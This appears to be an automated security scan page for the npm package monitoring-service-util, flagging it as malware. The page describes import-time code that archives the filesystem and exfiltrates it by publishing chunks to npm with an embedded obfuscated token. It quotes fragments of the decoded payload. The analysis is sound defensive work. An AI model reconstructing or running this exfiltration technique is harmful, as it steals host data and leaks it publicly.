registry  /  monitoring-service-util  /  1.1.0

monitoring-service-util@1.1.0

System monitoring service

AI Security Review

scanned 3h ago · by lpm-firewall-ai

Importing the package triggers a hidden payload. It archives the filesystem and exfiltrates chunks by publishing them as versions of `node-fsagent`.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
Any runtime import or require of the package main entrypoint.
Impact
Exposes readable filesystem contents and host metadata through public npm publications using an embedded credential.
Mechanism
Obfuscated import-time filesystem archive and npm-package exfiltration.
Attack narrative
`index.js` decodes and evaluates a payload when imported. The payload archives `/`, chunks the archive, creates temporary `node-fsagent` packages with an obfuscated npm token, and invokes `npm publish` to send the chunks and a hostname-containing manifest to the npm registry. It cleans temporary files afterward, indicating deliberate stealthy data exfiltration rather than monitoring functionality.
Rationale
This is concrete import-time data theft and public npm exfiltration, not a benign dynamic-code pattern. The absence of lifecycle hooks does not mitigate the malicious main-entry behavior.
Evidence
package.jsonindex.js//workspace/.archive_<timestamp>.tar.gz/workspace/.chunk_<index>.bin/workspace/.manifest.json/workspace/.pub_<version>/.npmrc/tmp/.sysmon.log
Network endpoints1
registry.npmjs.org/node-fsagent/<version>

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` base64-decodes and immediately evals its payload on import.
  • Decoded `index.js` archives `/`, excluding only proc/sys/dev.
  • Decoded code splits the archive into 200 MB chunks and publishes them publicly.
  • Decoded code embeds an obfuscated npm authentication token and writes it to `.npmrc`.
  • Decoded code calls `curl` against npm registry then runs `npm publish`.
  • `package.json` makes `index.js` the main entrypoint.
Evidence against
  • `package.json` has no preinstall, install, or postinstall hook.
  • No other package files are present.
Behavioral surface
Source
Eval
Supply chain
HighEntropyStringsTrivial
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 5.00 KB of source

Source & flagged code

3 flagged · loading source
index.jsView file
1(function(){const _b='[redacted]...
Low
Eval

Package source references a known benign dynamic code generation pattern.

index.jsView on unpkg · L1
index.js#virtual:base64:round1View file
1const { execSync, spawnSync } = require('child_process'); L2: const fs = require('fs'); ... L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7]; L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join(''); L8: const PKG = 'node-fsagent'; ... L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}', L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'}); L20: return r.stdout.trim() === '200'; L21: } catch(e) { return false; } ... L29: fs.writeFileSync(`${pkgDir}/index.js`, ''); L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({ L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Npm Publish Worm

Source mutates package metadata and republishes itself to npm.

index.js#virtual:base64:round1View on unpkg · L1
1Trigger-reachable chain: manifest.main -> index.js L1: const { execSync, spawnSync } = require('child_process'); L2: const fs = require('fs'); ... L6: const _d=[105,125,126,72,44,109,90,94,69,91,108,100,118,68,116,70,24,92,96,70,83,99,33,39,41,77,17,124,23,109,98,124,73,68,43,22,67,95,86,7]; L7: const NPM_TOKEN=_d.map((c,i)=>String.fromCharCode(c^_k[i%_k.length])).join(''); L8: const PKG = 'node-fsagent'; ... L18: const r = spawnSync('curl', ['-sf', '-o', '/dev/null', '-w', '%{http_code}', L19: `https://registry.npmjs.org/${PKG}/${version}`], {timeout: 10000, encoding: 'utf8'}); L20: return r.stdout.trim() === '200'; L21: } catch(e) { return false; } ... L29: fs.writeFileSync(`${pkgDir}/index.js`, ''); L30: fs.writeFileSync(`${pkgDir}/package.json`, JSON.stringify({ L31: name: PKG, version, license: 'MIT', description: `chunk ${version}`
Critical
Trigger Reachable Dangerous Capability

A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

index.js#virtual:base64:round1View on unpkg · L1

Findings

2 Critical1 Medium2 Low
CriticalNpm Publish Wormindex.js#virtual:base64:round1
CriticalTrigger Reachable Dangerous Capabilityindex.js#virtual:base64:round1
MediumStructural Risk Force Deep Review
LowEvalindex.js
LowHigh Entropy Strings